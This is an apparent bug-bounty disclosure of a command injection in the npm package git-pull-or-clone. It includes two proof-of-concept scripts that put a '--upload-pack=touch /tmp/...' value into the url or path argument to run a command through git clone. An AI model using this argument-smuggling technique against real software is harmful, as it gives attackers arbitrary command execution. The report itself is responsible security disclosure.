git-clone-or-pull
describes itself as a tool to ensure a git repo exists on disk and that it's up-to-date.
Resources:
- Project's GitHub source code: https://github.com/feross/git-pull-or-clone
- Project's npm package: https://npmjs.org/package/git-pull-or-clone
I'm reporting a Command Injection vulnerability in git-clone-or-pull
npm package.
A use of the --upload-pack
feature of git is also supported for git clone
, and allows users to execute arbitrary commands on the OS.
The source includes the use of the secure child process API spawn()
(see here: https://github.com/feross/git-pull-or-clone/blob/master/index.js#L28-L33) however the outpath
parameter passed to it may be a command line argument to the git clone
command and result in arbitrary command injection.
If users are in control either of the url (url
) to clone, or the directory path (outPath
) to clone it to then the vulnerability applies.
Install git-clone-or-pull@2.0.1
, which is the latest.
POC 1:
const gitPullOrClone = require('git-pull-or-clone')
const repo = 'file:///tmp/zero12345'
const path = '--upload-pack=touch /tmp/pwn3'
gitPullOrClone(repo, path, (err) => {
if (err) throw err
console.log('SUCCESS!')
})
Observe a new file created: /tmp/pwn3
POC 2:
const gitPullOrClone = require('git-pull-or-clone')
const repo = '--upload-pack=touch /tmp/pwn4'
const path = 'file:///tmp/zero12345'
gitPullOrClone(repo, path, (err) => {
if (err) throw err
console.log('SUCCESS!')
})
Observe a new file created: /tmp/pwn4
Liran Tal
Busy week on all fronts, Java and JavaScript! :D
Here's a patch for adding the relevant test cases and fixing the vulnerability per the above suggestion as pointed out in (1). You may choose to further harden it with ideas I shared in (2).
You can review the patch here and when you're good to be on stand-by for a quick merge and push a release I'd be happy to send a Pull Request over to the repo.